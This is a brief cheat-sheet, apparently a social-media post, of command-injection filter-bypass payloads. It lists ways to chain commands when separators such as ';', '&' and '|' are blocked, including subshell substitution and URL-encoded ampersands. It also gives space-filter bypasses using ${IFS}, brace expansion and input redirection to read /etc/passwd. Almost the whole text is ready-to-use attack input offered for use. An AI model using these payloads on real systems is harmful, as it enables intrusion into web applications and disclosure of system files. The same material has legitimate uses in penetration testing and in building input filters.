Bypass Command Injection
command injection xD
if " ; , &, && , | , || " that symbols are not work,
try with this .
cat lol.txt $(id>lol.txt)
cat x.txt id>x.txt
whoami %26 uname
space bypass
cat</etc/passwd
cat${IFS}/etc/passwd
{cat,/etc/passwd}
@404death